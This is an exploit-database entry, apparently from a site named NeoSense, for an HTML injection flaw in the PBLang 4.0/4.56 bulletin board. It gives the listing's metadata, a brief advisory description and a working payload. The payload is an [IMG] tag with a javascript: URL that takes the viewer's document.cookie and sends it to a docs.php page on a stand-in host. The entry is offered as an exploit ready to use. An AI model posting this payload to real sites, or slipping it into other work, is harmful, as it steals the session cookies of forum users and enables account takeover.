[] NeoSense
E X P L O I T S
title author type platform port cve id

PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection

Author: Quan Van Truong
type: webapps
platform: php
port: 
date_added: 2003-07-28 
date_updated: 2012-11-28 
verified: 1 
codes: OSVDB-2300 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/8286/info

PBLang is prone to an HTML injection vulnerability. An attacker may exploit this issue by including hostile HTML and script code encapsulated in PBLang tags, when posting to the bulletin board. Attacker supplied code may be rendered in the web browser of a user who views these areas of the site. This would occur in the security context of the site hosting PBLang.

[IMG]javascript:window.open("http://localhost/docs.php?docs="+escape
(document.cookie), "subwindows", "height=100,width=486")[/IMG]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.